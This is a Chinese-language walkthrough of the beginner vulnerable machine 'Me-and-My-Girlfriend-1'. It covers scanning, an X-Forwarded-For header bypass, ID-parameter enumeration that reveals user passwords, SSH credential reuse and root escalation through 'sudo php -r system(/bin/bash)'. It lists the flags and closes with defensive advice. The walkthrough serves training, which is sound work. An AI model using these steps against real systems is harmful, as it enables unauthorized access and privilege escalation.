入门靶机训练1-Me-and-My-Girlfriend-1
字数 1060 2025-08-20 18:17:41
Me-and-My-Girlfriend-1 靶机渗透训练教学文档
靶机概述
- 名称:Me-and-My-Girlfriend-1
- 难度:入门级
- 主要技术点:信息收集、HTTP头绕过、水平越权、SSH撞库、PHP提权
一、信息收集阶段
1. 主机探测
- 使用工具:nmap/arp-scan
- 发现存活IP:192.168.116.128
2. 端口扫描
nmap -sV 192.168.116.128
- 开放端口:
- 22/tcp - SSH服务
- 80/tcp - HTTP服务
3. 目录扫描
- 使用工具:dirb/gobuster/dirsearch
- 命令示例:
gobuster dir -u http://192.168.116.128 -w /path/to/wordlist.txt
二、Web渗透阶段
1. 初步访问
- 直接访问80端口网站,前台无明显功能点
2. HTTP头绕过
- 发现网站限制只能从本地访问
- 绕过方法:添加X-Forwarded-For头
X-Forwarded-For: 127.0.0.1
- 实现方式:
- 使用Burp Suite修改请求头
- 使用浏览器插件:
- Firefox: Header Editor
- Chrome/IE: ModHeader
3. 功能分析
- 发现登录/注册功能
- SQL注入测试无果
4. 水平越权漏洞
- 登录后URL特征:
id= - 手动测试ID参数:
- id=1 → eweuhtandingan/skuyatuh
- id=2 → aingmaung/qwerty!!!
- id=3 → sundatea/indONEsia
- id=4 → sedihaingmah/cedihhihihi
- id=5 → alice/4lic3
- id=9 → abdikasepak/dorrrrr
三、系统权限获取
1. SSH撞库攻击
- 使用获取的凭据尝试SSH登录:
- alice/4lic3 → 登录成功
2. 获取Flag1
- 登录后查看当前目录:
ls
- 发现Flag1:
gfriEND{2f5f21b2af1b8c3e227bcf35544f8f09}
四、权限提升阶段
1. 检查sudo权限
sudo -l
- 发现:
User alice may run the following commands on target:
(root) NOPASSWD: /usr/bin/php
2. PHP提权
- 测试PHP执行:
php -r "phpinfo();"
- 提权命令:
sudo php -r "system('/bin/bash');"
- 成功获取root shell
3. 获取Flag2
- 进入root目录:
cd /root
ls
- 发现Flag2:
gfriEND{56fbeef560930e77ff984b644fde66e7}
关键知识点总结
- HTTP头绕过:X-Forwarded-For常用于绕过IP限制
- 水平越权:通过修改ID参数访问其他用户数据
- 凭据重用:Web应用凭据可能在SSH等服务中重用
- sudo提权:检查用户可无密码执行的命令
- PHP提权:通过PHP的system函数执行shell
防御建议
- 实施严格的访问控制,不只是依赖HTTP头
- 使用随机UUID而非自增ID作为用户标识
- 实施密码策略,避免密码重用
- 限制sudo权限,避免给普通用户过高权限
- 对系统进行定期安全审计